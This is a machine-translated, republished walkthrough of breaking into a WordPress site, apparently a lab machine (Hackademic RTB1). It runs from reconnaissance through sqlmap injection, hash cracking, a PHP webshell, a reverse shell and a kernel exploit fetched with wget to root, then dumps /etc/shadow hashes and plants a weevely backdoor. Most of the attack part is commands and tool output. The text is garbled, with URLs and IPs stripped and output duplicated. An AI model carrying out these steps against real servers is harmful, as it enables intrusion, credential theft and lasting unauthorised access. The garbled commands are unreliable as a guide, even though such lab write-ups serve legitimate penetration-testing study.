How hackers have hacked into your site

Source: Internet
Author: User
Tags gopher website server what scripting domain name registration wordpress database

The question is difficult to answer, in simple terms ,, there are many ways to invade a website. The purpose of this article is to demonstrate the techniques that hackers commonly use to scan and invade websites.
Suppose your site is:

Let's ping this server:

We got an IP address:– This is the IP address of our destination server. can help us find other domains that are bound to this server:

Same IP
Sites hosted on IP Address
There are 26 sites on this server ( Many hackers will choose to attack different sites on the same server to invade your site. But for the purposes of learning, we only choose to invade your server.
We need to get a message from your site:
1.DNS Records (A,NS,TXT,MX and SOA)
2. Type of Web server (APACHE,IIS,TOMCAT)
3. Domain name registration information (which company owns this domain name)
4. Your name, address, email and phone number
5. The type of script that is running on your website (php,asp,,jsp,cfm)
6. Type of operating system for the server (Unix,linux,windows,solaris)
7. Server Open Ports (80,443,21, etc.) now let's look for the DNS records for the site. Select Site "" to achieve this goal.

We found that the DNS records on the site were:

Let's check the type of Web server:

We can see that the website server is using Apache. We'll check the Apache version later. SITE Information
Website status:active
Server Type:apache
Alexa trend/rank:1 month:3,213,968 3 month:2,161,753
Page views per visit:1 month:2.0 3 month:3.7 Next we look for the domain name registration information:

We have registered people and other important information. We can use Whatweb to detect what scripting language your site is using, as well as the type of operating system and the version of the Web server.

We can see that the website is using WordPress, the operating system type is Fedora Linux, the website server version is Apache 2.2.15, let us check the server on the open port:
We use Nmap:
1. detect which services are running on the server:
[Email protected]:/# nmap-sv

Starting Nmap 5.59beta1 ( at 2011-12-28 06:39
Nmap Scan Report for (
Host is up (0.0013s latency).
Not shown:998 filtered ports
22/TCP closed SSH
80/TCP Open http Apache httpd 2.2.15 (Fedora)
MAC address:00:0c:29:01:8a:4d (VMware)

Service Detection performed. Incorrect results at

Nmap done:1 IP Address (1 host up) scanned in 11.56 seconds 2. Detection of server OS
[Email protected]:/# nmap-o

Starting Nmap 5.59beta1 ( at 2011-12-28 06:40
Nmap Scan Report for (
Host is up (0.00079s latency).
Not shown:998 filtered ports
22/TCP closed SSH

80/TCP Open http
MAC address:00:0c:29:01:8a:4d (VMware)
Device type:general Purpose
Running:linux 2.6.X
OS details:linux 2.6.22 (Fedora Core 6)
Network distance:1 Hop

OS Detection performed. Incorrect results at

Nmap done:1 IP Address (1 host up) scanned in 7.42 seconds server only open 80 ports, operating system is Linux 2.6.22 (Fedora Core 6)
Now that we've got all the important information, let's do a bit of vulnerability testing, such as SQL injection, blinds, LFI,RFI,XSS,CSRF, etc.
We use to get information and weaknesses:
[Email protected]:/pentest/web/nikto# perl

-Nikto v2.1.4


+ Target ip:
+ Target
+ Target port:80
+ Start time:2011-12-29 06:50:03


+ server:apache/2.2.15 (Fedora)
+ ETag header found on server, inode:12748, size:1475, mtime:0x4996d177f5c3b
+ apache/2.2.15 appears to being outdated (current was at least apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 is also current.
+ Allowed HTTP methods:get, HEAD, POST, OPTIONS, TRACE
+ Osvdb-877:http TRACE method is active, suggesting the host was vulnerable to XST
+ OSVDB-3268:/icons/: Directory indexing found.
+ OSVDB-3233:/icons/readme:apache default file found.
+ 6448 Items checked:1 error (s) and 6 item (s) reported on remote host
+ End time:2011-12-29 06:50:37 (seconds)


+ 1 Host (s) tested

You can also use W3AF, a tool that can be found in Backtrack 5 R1
[Email protected]:/pentest/web/w3af#./w3af_gui

Starting W3AF, running on:
Python version:
2.6.5 (r265:79063, APR 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version:2.20.1
PyGTK version:2.17.0

W3af-web application Attack and Audit Framework
Author:andres Riancho and the W3AF team.
We can insert the URL and select the full audit option:

Wait a moment and the results will appear.

There are SQL injection vulnerabilities and other vulnerabilities in the Web site.
Let's go deep into SQL injection: This address is the injection point,

We'll use Sqlmap and dump all the database information needed for the intrusion.
sqlmap–u URL

Wait for a moment:

Select "N" to continue:

The SQL injection type of the site is the version of the error-based MySQL database is 5.
Add the parameter "-dbs" to find all the databases:

We have found 3 databases:

Exporting WordPress database tables with Dump–dwordpress-tables

We need to export the "wp_users" table to get user information and password hash, then we can try to crack the password finally landed in WordPress backstage.
Using Parameters "-t Wp_users–columns"

22 columns of data were found:

Use the parameter-C user_login,user_pass–dump to export the column.
Then we get the account password.

Then use this website to convert MD5 to plaintext (not all hashes can be converted successfully)

The plaintext password is: q1w2e3
Username "Georgemiller" let's log in to WordPress backstage:

Now let's try uploading a PHP Webshell to execute some Linux commands on this server.
Edit WordPress "Textile" Plugin
Edit it

Insert a PHP Webshell instead of a real plugin. Then click Upload, PHP Webshell is successfully uploaded to the server.

Now, PHP Webshell is running successfully. Now you can browse all the files on the site, but we want the root of the server and then invade other sites.
Select "Back-connect" in PHP Webshell and connect to our IP "″ port" 5555″

Before we click on the connection, we must first listen to a "5555" port on this machine.

Click Connect and we'll get a window like this:

Let's try the Linux command.
uid=48 (Apache) gid=489 (Apache) groups=489 (Apache)
Linux HackademicRTB1 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 gnu/linux
The ID command is used to tell us the user ID and user group
The PWD command can tell us where we are now.
The Uname–a command is used to get some information and kernel version
Well, we now know that the kernel version of the server is
Ok, now we knew this server kernel version is
We can find the exploit for this version in
Enter: " kernel 2.6.31

The above results are not appropriate because they are not used for power. Next, that's it!
Copy this connection
In the Netcat shell, enter:
wget Http:// roro.c--2011-12-28 00:48:01--
Resolving ...,
Connecting to||:80 ... Connected.
HTTP request sent, awaiting response ... 301 Moved Permanently
--2011-12-28 00:48:02--
Connecting to||:80 ... Connected.
HTTP request sent, awaiting response ... OK
length:7154 (7.0K) [Application/txt]
Saving to: ' RORO.C '

0K ... 100% 29.7k=0.2s
We use the wget command to get Exploit,-o is to rename the file as: roro.c
Linux kernel exploits most are developed in C language, so we save the suffix named. C, directly browse the source file can be directly see source code:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>

#define Recvport 5555
#define SendPort 6666

Intprep_sock (Intport)

INTs, ret;
Structsockaddr_in addr;

s = socket (pf_rds, sock_seqpacket, 0);

if (s < 0) {
printf ("[*] Could not open socket.\n");
Exit (-1);
memset (&addr, 0, sizeof (addr));

All the above lines indicate it is exploit are written in C language
After we saved us exploit on server, we'll compile it to elf format by typing we save exploit on the server, we can compile it:
GCC Roro.c–o RoRo
Then execute the exploit:

[*] Linux kernel >= 2.6.30 RDS socket Exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses ...
[+] Resolved Rds_proto_ops to 0xe09f0b20
[+] Resolved Rds_ioctl to 0xe09db06a
[+] Resolved Commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] overwriting function pointer ...
[*] Linux kernel >= 2.6.30 RDS socket Exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses ...
[+] Resolved Rds_proto_ops to 0xe09f0b20
[+] Resolved Rds_ioctl to 0xe09db06a
[+] Resolved Commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] overwriting function pointer ...
[*] Triggering payload ...
[*] Restoring function pointer ... Id
At this time we are already root authority.
Uid=0 (Root) gid=0 (root)

We can browse/etc/shadow file

root:$6$4l1ovmlpsv28evct$fqycc5mozz8mqiqgfudlshuk7r1emu/ Fxw3pocob39lxekt9vy6hygkxcleo.ab9f9t7bqtdxsjvccy.iylcp0:14981:0:99999:7:::
vcsa:!! : 14557::::::
avahi-autoipd:!! : 14557::::::
Ntp:!! : 14557::::::
dbus:!! : 14557::::::
rtkit:!! : 14557::::::
nscd:!! : 14557::::::
tcpdump:!! : 14557::::::
avahi:!! : 14557::::::
haldaemon:!! : 14557::::::
openvpn:!! : 14557::::::
Apache:!! : 14557::::::
saslauth:!! : 14557::::::
mailnull:!! : 14557::::::
smmsp:!! : 14557::::::
smolt:!! : 14557::::::
Sshd:!! : 14557::::::
pulse:!! : 14557::::::
Gdm:!! : 14557::::::
P0wnbox. Team:$6$rparluwe8rm9avwv$a5cooducqqy7ngvtnxafj2d5smggrrfsr6tp8g7iatveet37lugjyvhm1myhelcypkijd8yv5olmnuhwbql76 /:14981:0:99999:7:::
Mysql:!! : 14981:::::: Browse/etc/passwd file

Ftp:x:14:50:ftp User:/var/ftp:/sbin/nologin
Vcsa:x:69:499:virtual Console Memory Owner:/dev:/sbin/nologin
Dbus:x:81:81:system message Bus:/:/sbin/nologin
NSCD:X:28:493:NSCD Daemon:/:/sbin/nologin
Haldaemon:x:68:491:hal Daemon:/:/sbin/nologin
saslauth:x:495:488: "SASLAUTHD user":/var/empty/saslauth:/sbin/nologin
sshd:x:74:484:privilege-separated Ssh:/var/empty/sshd:/sbin/nologinpulse:x:493:483:pulseaudio System Daemon:/var/ Run/pulse:/sbin/nologin
P0wnbox. Team:x:500:500:p0wnbox. Team:/home/p0wnbox. Team:/bin/bash
Mysql:x:27:480:mysql Server:/var/lib/mysql:/bin/bash We can use "John the Ripper" to hack the user's password, but we won't do it.
Hackers need to leave a backdoor on the server for easy access later.
Here, we use weevely to generate a small, password-coded PHP backdoor, which is then uploaded to the server to achieve the goal.
weevely usage :
[Email protected]:/pentest/backdoors/web/weevely#./

Weevely 0.3-generate and manage Stealth PHP backdoors.
Copyright (c) 2011-2012 weevely developers
website: [Options]

-H,--help show this help message and exit
-G,--generate generate backdoor crypted code, Requires-o and-p.
-O OUTPUT,--output=output
Output filename for generated backdoor.
-C COMMAND,--command=command
Execute a single command and exit, Requires-u And-p
-T,--terminal Start a terminal-like session, Requires-u And-p.
-C CLUSTER,--cluster=clusterstart in CLUSTER mode reading items from the Give
File, in the form ' Label,url,password ' where label is
-P PASSWORD,--password=password
Password of the encrypted backdoor.

-u URL,--url=url Remote backdoor URL. Create a password- PHP Back Door
[Email protected]:/pentest/backdoors/web/weevely#./MAIN.PY-G-O hax.php-p koko

Weevely 0.3-generate and manage Stealth PHP backdoors.
Copyright (c) 2011-2012 weevely developers

+ Backdoor file ' hax.php ' created with password ' Koko '.
Upload a php backdoor via PHP Webshell

Once the upload is complete, we use the command to connect:
[Email protected]:/pentest/backdoors/web/weevely#./ Plugins/hax.php-p Koko

Weevely 0.3-generate and manage Stealth PHP backdoors. Copyright (c) 2011-2012 weevely developers

+ Using method ' System () '.
+ Retrieving terminal basic environment variables.

[[email protected]/var/www/html/hackademic_rtb1/wp-content/plugins]
Test our hax.php back door.

[via Infosecinstitute translation PPSBB]

How hackers have hacked into your site

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.